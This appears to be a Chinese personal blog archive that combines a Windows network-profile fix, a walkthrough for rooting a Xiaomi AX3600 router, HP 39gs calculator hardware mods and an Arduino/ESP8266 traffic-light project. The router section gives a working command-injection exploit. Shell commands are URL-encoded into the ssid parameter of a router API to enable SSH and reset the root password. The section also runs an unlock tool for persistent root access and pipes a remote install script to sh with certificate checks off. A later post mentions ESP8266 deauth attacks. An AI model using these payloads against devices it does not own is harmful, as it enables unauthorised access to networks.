HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles

删除掉相关的注册子键，如图所示:

然后在控制面板（Win+R, control）中禁用再启用网卡即可。

参考资料

• Remove the “2” after the SSID on Windows 8.0
  

获取 root 权限并打开 ssh

使用官方固件漏洞开启 ssh

先需要将固件版本降级到1.0.17，固件可以在这里下载。

连接上 wifi 并打开路由器管理页面

登录后浏览器地址栏应该是这样的：

1

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router

复制记下这个<STOK>

把下面 URL 中的<STOK>替换成刚才的，并访问

1

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

会显示{"code":0}

再来一个 URL，注意替换STOK

1

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

到这里 ssh 就成功打开了
可以使用用户名 root+密码 admin 来 ssh 登录路由器

1

ssh root@192.168.31.1

输入密码回车后可以看到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

BusyBox v1.25.1 (YYYY-MM-DD HH:mm:ss UTC) built-in shell (ash)

 -----------------------------------------------------
       Welcome to XiaoQiang!
 -----------------------------------------------------
  $$$$$$\  $$$$$$$\  $$$$$$$$\      $$\      $$\        $$$$$$\  $$\   $$\
 $$  __$$\ $$  __$$\ $$  _____|     $$ |     $$ |      $$  __$$\ $$ | $$  |
 $$ /  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ /  $$ |$$ |$$  /
 $$$$$$$$ |$$$$$$$  |$$$$$\         $$ |     $$ |      $$ |  $$ |$$$$$  /
 $$  __$$ |$$  __$$< $$  __|        $$ |     $$ |      $$ |  $$ |$$  $$<
 $$ |  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ |  $$ |$$ |\$$\
 $$ |  $$ |$$ |  $$ |$$$$$$$$\       $$$$$$$$$  |       $$$$$$  |$$ | \$$\
 \__|  \__|\__|  \__|\________|      \_________/        \______/ \__|  \__|


root@XiaoQiang:~#

这个 RUOK 就很灵性

更改密码及权限维持

重新设置 root 密码

1
2

passwd root
#在路由器shell执行

这样并不能保证升级后 ssh 仍能使用，如果留在这个版本漏洞还是有一定风险。

备份

1
2

nanddump -f /tmp/bdata_mtd9.img /dev/mtd9
#在路由器shell执行

用你喜欢的方式下载bdata_mtd9.img，我使用 scp 命令

1

scp root@192.168.31.1:/tmp/bdata_mtd9.img ~/

下载fuckax3600(作者：paldier) 并传到路由器的/tmp目录

1

scp ~/Downloads/fuckax3600 root@192.168.31.1:/tmp/

1
2
3

chmod +x /tmp/fuckax3600
/tmp/fuckax3600 unlock
#在路由器shell执行

等待路由器重启后

1
2

/tmp/fuckax3600 hack
#在路由器shell执行

会自动设置永久 ssh、telnet、uart 权限，同时会计算出默认的 root 密码，注意记录密码，恢复出厂后 telnet 和 ssh 需要用

1
2

/tmp/fuckax3600 lock
#在路由器shell执行

然后就可以升级新版本了，如果升级完新版本 ssh 不能用

使用 telnet 登录

1

telnet 192.168.31.1

1
2
3

sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear
/etc/init.d/dropbear start
#在路由器shell执行

安装 clash 作为透明代理

这里使用一键脚本ShellClash

1
2
3

sh -c "$(curl -kfsSl https://cdn.jsdelivr.net/gh/juewuy/ShellClash@latest/install.sh)" && source /etc/profile &> /dev/null
clash
#在路由器shell执行

使用clash命令就能打开管理脚本

参考

• [AX3600] 小米 ax3600 获取 root 权限【简单快速】【修复丢 ssid】

• juewuy/ShellClash

• Clash for Miwifi 安装及使用教程

照抄+乱改的配置文件 还算有点样子

我 blog 所有源文件基本都在 blog / about 公开。如果想发现我的 blog 有错误就可以直接 pr 帮我解决啦

交换友链可以在这里pr。

总之，要是发现 blog 有什么异常欢迎联系我反馈。(◍•ᴗ•◍)❤

参考链接：

• Hexo Action on GitHub Marketplace
• GitHub Actions Documentation

HP 39gs 使用体验

2019 年底我购买了 HP 39gs，这是我接触到的第一台图形编程计算器。

没有 HP 计算器也想体验一下？

可以使用Emu48 for Android等模拟器。

操作

它使用线性输入，所以拿到手后我很快就学会了如何使用它。

不足的是字母等需要按 ALPHA 后输入的键标识位于实体键下方，需要适应。

计算及绘图

计算只能是小数或是通过小数化成的分数，部分计算甚至不及我的CASIO fx-82ES + A函数计算器。

计算$\sqrt{2}+\sqrt{2}$

得不到$2\sqrt{2}$

将只能得到近似结果2.82842712474

如果在分数模式下就会得到1217471/430441(精度 11)、478/169(精度 4)

绘图画简单的函数还是 OK 的

• 可以同时画多条
• 有几种坐标方式可选
• 可以求根、极值、面积、切线角度

其他程序

游戏非常多

我能想到的经典的几个：超级马里奥、贪吃蛇、BABAL、俄罗斯方块、扫雷

【百元科技神器-03】如何玩坏一个图形计算器（ by Jimmy Tian

群友编写的程序也很多，如中文阅读器、电子琴、摩尔斯电码、各种音乐、时钟、五子棋…

hpcalc上也有很多程序

我认为比较重要的一个程序是时钟调节器，降频可以省电或是减缓游戏速度，升频可以是作图和计算更快速。

HP 39gs 改造

拆开 HP 39gs

旋下两颗十字螺丝，打开电池盖，部分批次的计算器可能还有两颗螺丝也须取下。

打开后盖（由卡扣固定），小心不要弄断电池盒或蜂鸣器的连接线。

供电改造

HP 39gs 采用 4 节 AAA 电池供电(1.5V×4=6V)，但它实在有些太费电了，4 节全新电池 1 周-1 个月就需要更换。

一种解决方法是使用 Mini USB 和移动电源为 HP 39gs 供电。实在不是很方便，我决定为 HP 39gs 安装锂电池。

我的方案

• 锂电池充电+保护板
  我用的是带有 Type-C 接口的(也能选用 Micro-B)，比 Mini USB 更通用

• DC 升压板
  锂电池没有找到 6V 的，使用它由 3.7V 升压至 6V 给计算器供电

  如果不使用它也可以点亮计算器，只是计算器会判定电量低，开机就会有提示出现

  如果使用 7.4V 电池给计算器供电可能会导致花屏

• 锂电池
  HP 39gs 内部空间较大 要使用尺寸合适的

小心调节升压板的电位器使它输出 6V

接线：

1
2

电池+ -- B+ , OUT+ -- VIN+ , VOUT+ -- 计算器+
电池- -- B- , OUT- -- VIN- , VOUT- -- 计算器-

全部塞到计算器里固定好

别打我

其他方案

我的方案只是最基础的，最小程度破坏原机设计的修改。

评论区有大佬指出：可以通过 修改 ADC 电阻的阻值 以实现 系统自带低电量提醒 的功能，并且可以 省略升压板、减少能源损耗，同时增加内部空间。有兴趣使用此方案的话可以去评论区查看详细信息。

理论上可以做的改进还有不少，比如从 Mini USB 的接口引出电源线来为电池充电等。在下文提到的 ROM 升级中也有人通过修改电阻和显示屏，将 HP 39gs 升级为 HP 50g。

升级到 HP 48gII

更换 HP 39gs 的 ROM 芯片为更大容量的芯片并刷入 HP 48gII 计算器的操作系统后，HP 39gs 就会获得 HP 48gII 计算器的全部功能。——由 cncalc 计算器论坛的 nbzwt 研究发现

我使用的芯片是SST39VF1601-70-4I-EKE，购买时可以让卖家烧写好系统，就不需要自己用 JTAG 烧写了。

取下主板上的电磁屏蔽纸，使用烙铁或风枪更换图示芯片，注意方向，能否成功基本看焊接技术。

开机后应该就是 HP 48gII 的操作界面了

安装计算器，贴键盘贴。键盘贴可以自制，也能在网上购买

HP 48gII 使用体验

HP 48gII 除了和 HP 39gs 在按键上不同外，软件上也有许多的变化。

计算

得益于 HP 48gII 带有CAS功能(Erable-based)，在速度、精度上得到了较 HP 39gs 较大的提升。

HP 48gII 除了使用线性 Algebraic 输入，也能使用 EQW 自然书写。另外还支持大部分 HP 计算器都支持的RPN输入方式。

其他软件

HP 48gII 游戏体验我认为不如 HP 39gs，游戏较少（但 ROM 自带俄罗斯方块彩蛋），频率调节不便…

ROM 自带有时钟，可以用于查看时间日期。

编程语言使用RPL或 Algebraic RPL。

连接 PC

在 Windows 上，HP 48gII 使用 conn4x。原先 HP 39gs 使用的 conn3x 将不能继续用于连接 HP 48gII，传输时一般使用Xmodem Server

更多请见

• HP 39gs 升级 48gII
• HP39gs计算器改装锂电池供电
• 计算器百科
• cncalc
• hpcalc
• 登月 50 年：计算器与计算器游戏发展简史

以前在淘宝买过一个摇摇棒套件，用的单片机是 Atmel 的 AT89S52，大致的原理是当晃动开关连通后延时控制发光二极管的亮暗，达到显示文字/图案的效果，按按钮可以切换存储的多套文字/图案。电路是卖家设计的，程序给了个模版。

修改程序先用字模软件生成阴码/阳码，放到程序中后用 Keil 软件通过 ISP 串口烧写。

相较于那个套件，这次比赛中使用的 Arduino 开发版就显得简单些了。

关于比赛

介绍

设计一个十字路口，搭建交通灯系统，可以有自己的创新

材料

硬件：

• Arduino MEGA 2560 开发板
• Arduino MEGA 2560 扩展板
• TM1637 数码管
• LED 灯
• 杜邦线
• esp8266 (自己加的)

软件：

• Mixly For Windows
• 代码模版
• 连接教程、效果示例视频
• Arduino (要什么 Mixly，Arduino 不香吗)

部分代码实现及介绍

Arduino MEGA 2560

1
2
3
4
5
6
7
8

#include <TM1637.h>            //使用Grove4Display的库
TM1637 digit1(CLK,DIO);        //设置数码管管脚
digit1.init();                 //初始化数码管digit1
digit1.set(BRIGHT_TYPICAL);    //数码管设置亮度
digit1.display(0-3,0-9);       //使某位显示数字
pinMode(R/Y/G, OUTPUT);        //设置输出管脚
digitalWrite(R/Y/G,HIGH/LOW);  //使R/Y/G 亮/暗
Serial.begin(115200);          //使用串口通信 速率115200

基本就这些，再加几个判断和循环就没问题

Esp8266

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

#include <ESP8266WiFi.h>
#define APSSID "SSID"          //设置无线接入点名称
#define APPSK "password"       //设置无线接入点密码
#include <ESP8266WebServer.h>
ESP8266WebServer server(80);   //Web服务器在80端口运行
Serial.begin(115200);          //使用串口通信 速率115200

//设置Web服务器路径及相应内容
server.on("/", []() {
server.send(200, "text/html", "<h1>Traffic Light</h1><br /><a href=\"/ns\">Turn N-S to green</a><br /><a href=\"/we\">Turn W-E to green</a><br />");
});

server.on("/ns", []() {
server.send(200, "text/plain", "N-S turned to green");
Serial.print("NS");
});

server.on("/we", []() {
server.send(200, "text/plain", "W-E turned to green");
Serial.print("WE");
});

server.begin();                //启动Web服务器
server.handleClient();

它在这次的作品中通过串口与 Arduino MEGA 2560 建立数据连接，通过 Wi-Fi 与控制端建立数据连接，起到无线控制的作用。

P.S.:为什么我会买这块 Esp8266 呢？

Jimmy Tian 在他的视频中介绍过它：

【百元科技神器-01】如何「黑」掉你学校的指纹考勤机？ by Jimmy Tian

我觉得比较有意思、价格也很亲民就买了(NodeMcu 版本的便于开发，如果仅买一小块 Esp8266 也能用)

年轻人的第一块 Wi-Fi 模块

体验了一下这个固件，对于 2.4Ghz 的 Wi-Fi 来说 deauth 攻击的效果明显、且便于携带隐藏，但 esp8266 不支持工作在 5Ghz，退一步讲就算它支持 5Ghz，原先的攻击方式起不了作用，目前似乎也没有对 5Ghz 较为有效的 deauth 攻击方式

写在后面

在另一个比赛中摸过 Arduino Uno、PS 2 手柄及接收模块，也是挺好玩的

以前玩的比赛我都用的是能力风暴的机器人，这次玩的 Arduino 能实现的功能要比它多，但相对的编写调试甚至于上传程序，Arduino 都要比它麻烦一些